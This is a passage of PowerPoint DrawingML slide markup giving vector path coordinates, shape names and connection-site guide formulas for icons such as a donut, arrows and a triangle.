                    <a:pt x="605297" y="168239"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="168643" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1159119" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1159119" y="539093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1327763" y="539093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1327763" y="2245406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318300" y="2245406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1127664" y="2719000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200100" y="2719000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9464" y="2245406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2245406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="539093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168643" y="539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3" name="Rectangle 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61DFCD4A-250D-4565-B9BF-3EB2727DF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579" y="3848133"/>
              <a:ext cx="330939" cy="260933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Donut 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{077F0151-42C6-4168-9205-DCA71719D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511" y="4923426"/>
              <a:ext cx="304410" cy="330939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225AE540-4E33-4C43-BCFF-ACE56AD8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8127" y="4821478"/>
              <a:ext cx="257012" cy="330939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Rounded Rectangle 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B08C69BE-22CC-4031-8AD6-A8B0C2C8A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7386" y="3842640"/>
              <a:ext cx="309335" cy="30930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117745" y="2289258"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2253931" y="2373161"/>
                    <a:pt x="2290104" y="2397532"/>
                    <a:pt x="2392952" y="2510010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2551302" y="2699530"/>
                    <a:pt x="2456894" y="2911213"/>
                    <a:pt x="2285214" y="2987744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2046443" y="3084914"/>
                    <a:pt x="1864058" y="3073352"/>
                    <a:pt x="1634211" y="2962065"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1390134" y="2803501"/>
                    <a:pt x="1391670" y="2463226"/>
                    <a:pt x="1703848" y="2355742"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1867216" y="2309770"/>
                    <a:pt x="1932946" y="2304275"/>
                    <a:pt x="2117745" y="2289258"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1895201" y="880902"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2049819" y="878570"/>
                    <a:pt x="2210983" y="1023567"/>
                    <a:pt x="2276065" y="1236504"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2350446" y="1479859"/>
                    <a:pt x="2271166" y="1719799"/>
                    <a:pt x="2098990" y="1772423"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1926813" y="1825048"/>
                    <a:pt x="1726940" y="1670429"/>
                    <a:pt x="1652559" y="1427074"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1578180" y="1183717"/>
                    <a:pt x="1657458" y="943778"/>
                    <a:pt x="1829635" y="891153"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2577034" y="759541"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1972441" y="767241"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1929619" y="768623"/>
                    <a:pt x="1886068" y="773785"/>
                    <a:pt x="1842289" y="783004"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1492048" y="856758"/>
                    <a:pt x="1259862" y="1162246"/>
                    <a:pt x="1323686" y="1465331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1380617" y="1735681"/>
                    <a:pt x="1653838" y="1912801"/>
                    <a:pt x="1960688" y="1894227"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1954787" y="1896039"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1858317" y="2000800"/>
                    <a:pt x="1978682" y="2148499"/>
                    <a:pt x="2028445" y="2210716"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1914361" y="2213518"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1373805" y="2249742"/>
                    <a:pt x="1143478" y="2466102"/>
                    <a:pt x="1177422" y="2809298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1211366" y="3152493"/>
                    <a:pt x="1741992" y="3244646"/>
                    <a:pt x="2060873" y="3229704"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2379755" y="3214763"/>
                    <a:pt x="2698110" y="2930571"/>
                    <a:pt x="2719230" y="2648210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2699867" y="2070575"/>
                    <a:pt x="2052418" y="2112562"/>
                    <a:pt x="2282832" y="1799863"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2510843" y="1673695"/>
                    <a:pt x="2641919" y="1435236"/>
                    <a:pt x="2592014" y="1198247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2566015" y="1074781"/>
                    <a:pt x="2494906" y="970760"/>
                    <a:pt x="2395028" y="897200"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2564389" y="891152"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2644558" y="859402"/>
                    <a:pt x="2739013" y="796695"/>
                    <a:pt x="2769176" y="767327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2755484" y="761968"/>
                    <a:pt x="2680847" y="759625"/>
                    <a:pt x="2577034" y="759541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Down Arrow 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1349248-BC3E-4DCD-9051-D2CF537FC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733" y="3025716"/>
              <a:ext cx="257188" cy="377708"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2745756" h="4032448">
                  <a:moveTo>
                    <a:pt x="1622229" y="1008112"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2371247" y="1008112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2371247" y="3081405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2745756" y="3081405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1996738" y="4032448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1247720" y="3081405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1622229" y="3081405"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="749018" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1498036" y="951043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1123527" y="951043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1123527" y="3024336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374509" y="3024336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374509" y="951043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="9510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Isosceles Triangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE07520C-E6FE-4F09-A947-EA6F68046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8297" y="5013963"/>
              <a:ext cx="300437" cy="20934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3A5724F3-C522-4B0D-93EE-ECF44EBFB9F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="678773">
              <a:off x="10108027" y="4569149"/>
              <a:ext cx="338104" cy="343148"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst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62894 h 3939732"/>
                <a:gd name="connsiteX1" fmla="*/ 1768767 w 3897869"/>
                <a:gd name="connsiteY1" fmla="*/ 1381594 h 3939732"/>
                <a:gd name="connsiteX2" fmla="*/ 1517577 w 3897869"/>
                <a:gd name="connsiteY2" fmla="*/ 2033280 h 3939732"/>
                <a:gd name="connsiteX3" fmla="*/ 1928990 w 3897869"/>
                <a:gd name="connsiteY3" fmla="*/ 2631017 h 3939732"/>
                <a:gd name="connsiteX4" fmla="*/ 2318674 w 3897869"/>
                <a:gd name="connsiteY4" fmla="*/ 1997628 h 3939732"/>
                <a:gd name="connsiteX5" fmla="*/ 2293344 w 3897869"/>
                <a:gd name="connsiteY5" fmla="*/ 1825498 h 3939732"/>
                <a:gd name="connsiteX6" fmla="*/ 1853384 w 3897869"/>
                <a:gd name="connsiteY6" fmla="*/ 1362894 h 3939732"/>
                <a:gd name="connsiteX7" fmla="*/ 1594841 w 3897869"/>
                <a:gd name="connsiteY7" fmla="*/ 36923 h 3939732"/>
                <a:gd name="connsiteX8" fmla="*/ 3869632 w 3897869"/>
                <a:gd name="connsiteY8" fmla="*/ 1508593 h 3939732"/>
                <a:gd name="connsiteX9" fmla="*/ 3670773 w 3897869"/>
                <a:gd name="connsiteY9" fmla="*/ 2416710 h 3939732"/>
                <a:gd name="connsiteX10" fmla="*/ 3671055 w 3897869"/>
                <a:gd name="connsiteY10" fmla="*/ 2417653 h 3939732"/>
                <a:gd name="connsiteX11" fmla="*/ 3164582 w 3897869"/>
                <a:gd name="connsiteY11" fmla="*/ 2822329 h 3939732"/>
                <a:gd name="connsiteX12" fmla="*/ 3176822 w 3897869"/>
                <a:gd name="connsiteY12" fmla="*/ 2836256 h 3939732"/>
                <a:gd name="connsiteX13" fmla="*/ 3146203 w 3897869"/>
                <a:gd name="connsiteY13" fmla="*/ 2835026 h 3939732"/>
                <a:gd name="connsiteX14" fmla="*/ 3151211 w 3897869"/>
                <a:gd name="connsiteY14" fmla="*/ 2827425 h 3939732"/>
                <a:gd name="connsiteX15" fmla="*/ 2397082 w 3897869"/>
                <a:gd name="connsiteY15" fmla="*/ 2555951 h 3939732"/>
                <a:gd name="connsiteX16" fmla="*/ 2396219 w 3897869"/>
                <a:gd name="connsiteY16" fmla="*/ 2549477 h 3939732"/>
                <a:gd name="connsiteX17" fmla="*/ 1746058 w 3897869"/>
                <a:gd name="connsiteY17" fmla="*/ 3084844 h 3939732"/>
                <a:gd name="connsiteX18" fmla="*/ 990519 w 3897869"/>
                <a:gd name="connsiteY18" fmla="*/ 2011053 h 3939732"/>
                <a:gd name="connsiteX19" fmla="*/ 1593790 w 3897869"/>
                <a:gd name="connsiteY19" fmla="*/ 959078 h 3939732"/>
                <a:gd name="connsiteX20" fmla="*/ 1746058 w 3897869"/>
                <a:gd name="connsiteY20" fmla="*/ 937262 h 3939732"/>
                <a:gd name="connsiteX21" fmla="*/ 2206475 w 3897869"/>
                <a:gd name="connsiteY21" fmla="*/ 1165194 h 3939732"/>
                <a:gd name="connsiteX22" fmla="*/ 2185910 w 3897869"/>
                <a:gd name="connsiteY22" fmla="*/ 869152 h 3939732"/>
                <a:gd name="connsiteX23" fmla="*/ 2656644 w 3897869"/>
                <a:gd name="connsiteY23" fmla="*/ 794408 h 3939732"/>
                <a:gd name="connsiteX24" fmla="*/ 2828567 w 3897869"/>
                <a:gd name="connsiteY24" fmla="*/ 2090795 h 3939732"/>
                <a:gd name="connsiteX25" fmla="*/ 3312378 w 3897869"/>
                <a:gd name="connsiteY25" fmla="*/ 2032862 h 3939732"/>
                <a:gd name="connsiteX26" fmla="*/ 3289926 w 3897869"/>
                <a:gd name="connsiteY26" fmla="*/ 1337965 h 3939732"/>
                <a:gd name="connsiteX27" fmla="*/ 3290031 w 3897869"/>
                <a:gd name="connsiteY27" fmla="*/ 1338068 h 3939732"/>
                <a:gd name="connsiteX28" fmla="*/ 1700745 w 3897869"/>
                <a:gd name="connsiteY28" fmla="*/ 566301 h 3939732"/>
                <a:gd name="connsiteX29" fmla="*/ 571995 w 3897869"/>
                <a:gd name="connsiteY29" fmla="*/ 2265435 h 3939732"/>
                <a:gd name="connsiteX30" fmla="*/ 2267548 w 3897869"/>
                <a:gd name="connsiteY30" fmla="*/ 3399556 h 3939732"/>
                <a:gd name="connsiteX31" fmla="*/ 3194376 w 3897869"/>
                <a:gd name="connsiteY31" fmla="*/ 3063923 h 3939732"/>
                <a:gd name="connsiteX32" fmla="*/ 3268026 w 3897869"/>
                <a:gd name="connsiteY32" fmla="*/ 3500815 h 3939732"/>
                <a:gd name="connsiteX33" fmla="*/ 2347298 w 3897869"/>
                <a:gd name="connsiteY33" fmla="*/ 3895311 h 3939732"/>
                <a:gd name="connsiteX34" fmla="*/ 42617 w 3897869"/>
                <a:gd name="connsiteY34" fmla="*/ 2371338 h 3939732"/>
                <a:gd name="connsiteX35" fmla="*/ 1594841 w 3897869"/>
                <a:gd name="connsiteY35" fmla="*/ 36923 h 3939732"/>
                <a:gd name="connsiteX0" fmla="*/ 1853384 w 3897869"/>
                <a:gd name="connsiteY0" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX1" fmla="*/ 1768767 w 3897869"/>
                <a:gd name="connsiteY1" fmla="*/ 1390324 h 3948462"/>
                <a:gd name="connsiteX2" fmla="*/ 1517577 w 3897869"/>
                <a:gd name="connsiteY2" fmla="*/ 2042010 h 3948462"/>
                <a:gd name="connsiteX3" fmla="*/ 1928990 w 3897869"/>
                <a:gd name="connsiteY3" fmla="*/ 2639747 h 3948462"/>
                <a:gd name="connsiteX4" fmla="*/ 2318674 w 3897869"/>
                <a:gd name="connsiteY4" fmla="*/ 2006358 h 3948462"/>
                <a:gd name="connsiteX5" fmla="*/ 2293344 w 3897869"/>
                <a:gd name="connsiteY5" fmla="*/ 1834228 h 3948462"/>
                <a:gd name="connsiteX6" fmla="*/ 1853384 w 3897869"/>
                <a:gd name="connsiteY6" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX7" fmla="*/ 1594841 w 3897869"/>
                <a:gd name="connsiteY7" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX8" fmla="*/ 3869632 w 3897869"/>
                <a:gd name="connsiteY8" fmla="*/ 1517323 h 3948462"/>
                <a:gd name="connsiteX9" fmla="*/ 3670773 w 3897869"/>
                <a:gd name="connsiteY9" fmla="*/ 2425440 h 3948462"/>
                <a:gd name="connsiteX10" fmla="*/ 3671055 w 3897869"/>
                <a:gd name="connsiteY10" fmla="*/ 2426383 h 3948462"/>
                <a:gd name="connsiteX11" fmla="*/ 3164582 w 3897869"/>
                <a:gd name="connsiteY11" fmla="*/ 2831059 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 3176822 w 3897869"/>
                <a:gd name="connsiteY12" fmla="*/ 2844986 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 3146203 w 3897869"/>
                <a:gd name="connsiteY13" fmla="*/ 2843756 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 3151211 w 3897869"/>
                <a:gd name="connsiteY14" fmla="*/ 2836155 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 2397082 w 3897869"/>
                <a:gd name="connsiteY15" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 2396219 w 3897869"/>
                <a:gd name="connsiteY16" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 1746058 w 3897869"/>
                <a:gd name="connsiteY17" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 990519 w 3897869"/>
                <a:gd name="connsiteY18" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 1593790 w 3897869"/>
                <a:gd name="connsiteY19" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 1746058 w 3897869"/>
                <a:gd name="connsiteY20" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2206475 w 3897869"/>
                <a:gd name="connsiteY21" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2185910 w 3897869"/>
                <a:gd name="connsiteY22" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 2656644 w 3897869"/>
                <a:gd name="connsiteY23" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 2828567 w 3897869"/>
                <a:gd name="connsiteY24" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3312378 w 3897869"/>
                <a:gd name="connsiteY25" fmla="*/ 2041592 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 3289926 w 3897869"/>
                <a:gd name="connsiteY26" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 3290031 w 3897869"/>
                <a:gd name="connsiteY27" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 1700745 w 3897869"/>
                <a:gd name="connsiteY28" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 571995 w 3897869"/>
                <a:gd name="connsiteY29" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 2267548 w 3897869"/>
                <a:gd name="connsiteY30" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 3194376 w 3897869"/>
                <a:gd name="connsiteY31" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 3268026 w 3897869"/>
                <a:gd name="connsiteY32" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 2347298 w 3897869"/>
                <a:gd name="connsiteY33" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX34" fmla="*/ 42617 w 3897869"/>
                <a:gd name="connsiteY34" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX35" fmla="*/ 1594841 w 3897869"/>
                <a:gd name="connsiteY35" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX0" fmla="*/ 1853384 w 3876965"/>
                <a:gd name="connsiteY0" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX1" fmla="*/ 1768767 w 3876965"/>
                <a:gd name="connsiteY1" fmla="*/ 1390324 h 3948462"/>
                <a:gd name="connsiteX2" fmla="*/ 1517577 w 3876965"/>
                <a:gd name="connsiteY2" fmla="*/ 2042010 h 3948462"/>
                <a:gd name="connsiteX3" fmla="*/ 1928990 w 3876965"/>
                <a:gd name="connsiteY3" fmla="*/ 2639747 h 3948462"/>
                <a:gd name="connsiteX4" fmla="*/ 2318674 w 3876965"/>
                <a:gd name="connsiteY4" fmla="*/ 2006358 h 3948462"/>
                <a:gd name="connsiteX5" fmla="*/ 2293344 w 3876965"/>
                <a:gd name="connsiteY5" fmla="*/ 1834228 h 3948462"/>
                <a:gd name="connsiteX6" fmla="*/ 1853384 w 3876965"/>
                <a:gd name="connsiteY6" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX7" fmla="*/ 1594841 w 3876965"/>
                <a:gd name="connsiteY7" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX8" fmla="*/ 3869632 w 3876965"/>
                <a:gd name="connsiteY8" fmla="*/ 1517323 h 3948462"/>
                <a:gd name="connsiteX9" fmla="*/ 3670773 w 3876965"/>
                <a:gd name="connsiteY9" fmla="*/ 2425440 h 3948462"/>
                <a:gd name="connsiteX10" fmla="*/ 3671055 w 3876965"/>
                <a:gd name="connsiteY10" fmla="*/ 2426383 h 3948462"/>
                <a:gd name="connsiteX11" fmla="*/ 3164582 w 3876965"/>
                <a:gd name="connsiteY11" fmla="*/ 2831059 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 3176822 w 3876965"/>
                <a:gd name="connsiteY12" fmla="*/ 2844986 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 3146203 w 3876965"/>
                <a:gd name="connsiteY13" fmla="*/ 2843756 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 3151211 w 3876965"/>
                <a:gd name="connsiteY14" fmla="*/ 2836155 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 2397082 w 3876965"/>
                <a:gd name="connsiteY15" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 2396219 w 3876965"/>
                <a:gd name="connsiteY16" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 1746058 w 3876965"/>
                <a:gd name="connsiteY17" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 990519 w 3876965"/>
                <a:gd name="connsiteY18" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 1593790 w 3876965"/>
                <a:gd name="connsiteY19" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 1746058 w 3876965"/>
                <a:gd name="connsiteY20" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2206475 w 3876965"/>
                <a:gd name="connsiteY21" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2185910 w 3876965"/>
                <a:gd name="connsiteY22" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 2656644 w 3876965"/>
                <a:gd name="connsiteY23" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 2828567 w 3876965"/>
                <a:gd name="connsiteY24" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3312378 w 3876965"/>
                <a:gd name="connsiteY25" fmla="*/ 2041592 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 3289926 w 3876965"/>
                <a:gd name="connsiteY26" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 3290031 w 3876965"/>
                <a:gd name="connsiteY27" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 1700745 w 3876965"/>
                <a:gd name="connsiteY28" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 571995 w 3876965"/>
                <a:gd name="connsiteY29" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 2267548 w 3876965"/>
                <a:gd name="connsiteY30" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 3194376 w 3876965"/>
                <a:gd name="connsiteY31" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 3268026 w 3876965"/>
                <a:gd name="connsiteY32" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 2347298 w 3876965"/>
                <a:gd name="connsiteY33" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX34" fmla="*/ 42617 w 3876965"/>
                <a:gd name="connsiteY34" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX35" fmla="*/ 1594841 w 3876965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671055 w 3888568"/>
                <a:gd name="connsiteY10" fmla="*/ 2426383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704679 w 3888568"/>
                <a:gd name="connsiteY10" fmla="*/ 2448797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164582 w 3888568"/>
                <a:gd name="connsiteY10" fmla="*/ 2831059 h 3948462"/>
                <a:gd name="connsiteX11" fmla="*/ 3176822 w 3888568"/>
                <a:gd name="connsiteY11" fmla="*/ 2844986 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 3146203 w 3888568"/>
                <a:gd name="connsiteY12" fmla="*/ 2843756 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 3151211 w 3888568"/>
                <a:gd name="connsiteY13" fmla="*/ 2836155 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 2397082 w 3888568"/>
                <a:gd name="connsiteY14" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 2396219 w 3888568"/>
                <a:gd name="connsiteY15" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 1746058 w 3888568"/>
                <a:gd name="connsiteY16" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 990519 w 3888568"/>
                <a:gd name="connsiteY17" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 1593790 w 3888568"/>
                <a:gd name="connsiteY18" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 1746058 w 3888568"/>
                <a:gd name="connsiteY19" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2206475 w 3888568"/>
                <a:gd name="connsiteY20" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2185910 w 3888568"/>
                <a:gd name="connsiteY21" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2656644 w 3888568"/>
                <a:gd name="connsiteY22" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 2828567 w 3888568"/>
                <a:gd name="connsiteY23" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 3362812 w 3888568"/>
                <a:gd name="connsiteY24" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3289926 w 3888568"/>
                <a:gd name="connsiteY25" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 3290031 w 3888568"/>
                <a:gd name="connsiteY26" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 1700745 w 3888568"/>
                <a:gd name="connsiteY27" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 571995 w 3888568"/>
                <a:gd name="connsiteY28" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 2267548 w 3888568"/>
                <a:gd name="connsiteY29" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 3194376 w 3888568"/>
                <a:gd name="connsiteY30" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 3268026 w 3888568"/>
                <a:gd name="connsiteY31" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 2347298 w 3888568"/>
                <a:gd name="connsiteY32" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 42617 w 3888568"/>
                <a:gd name="connsiteY33" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX34" fmla="*/ 1594841 w 3888568"/>
                <a:gd name="connsiteY34" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX0" fmla="*/ 1853384 w 3892469"/>
                <a:gd name="connsiteY0" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX1" fmla="*/ 1768767 w 3892469"/>
                <a:gd name="connsiteY1" fmla="*/ 1390324 h 3948462"/>
                <a:gd name="connsiteX2" fmla="*/ 1517577 w 3892469"/>
                <a:gd name="connsiteY2" fmla="*/ 2042010 h 3948462"/>
                <a:gd name="connsiteX3" fmla="*/ 1928990 w 3892469"/>
                <a:gd name="connsiteY3" fmla="*/ 2639747 h 3948462"/>
                <a:gd name="connsiteX4" fmla="*/ 2318674 w 3892469"/>
                <a:gd name="connsiteY4" fmla="*/ 2006358 h 3948462"/>
                <a:gd name="connsiteX5" fmla="*/ 2293344 w 3892469"/>
                <a:gd name="connsiteY5" fmla="*/ 1834228 h 3948462"/>
                <a:gd name="connsiteX6" fmla="*/ 1853384 w 3892469"/>
                <a:gd name="connsiteY6" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX7" fmla="*/ 1594841 w 3892469"/>
                <a:gd name="connsiteY7" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX8" fmla="*/ 3869632 w 3892469"/>
                <a:gd name="connsiteY8" fmla="*/ 1517323 h 3948462"/>
                <a:gd name="connsiteX9" fmla="*/ 3706266 w 3892469"/>
                <a:gd name="connsiteY9" fmla="*/ 2457195 h 3948462"/>
                <a:gd name="connsiteX10" fmla="*/ 3164582 w 3892469"/>
                <a:gd name="connsiteY10" fmla="*/ 2831059 h 3948462"/>
                <a:gd name="connsiteX11" fmla="*/ 3176822 w 3892469"/>
                <a:gd name="connsiteY11" fmla="*/ 2844986 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 3146203 w 3892469"/>
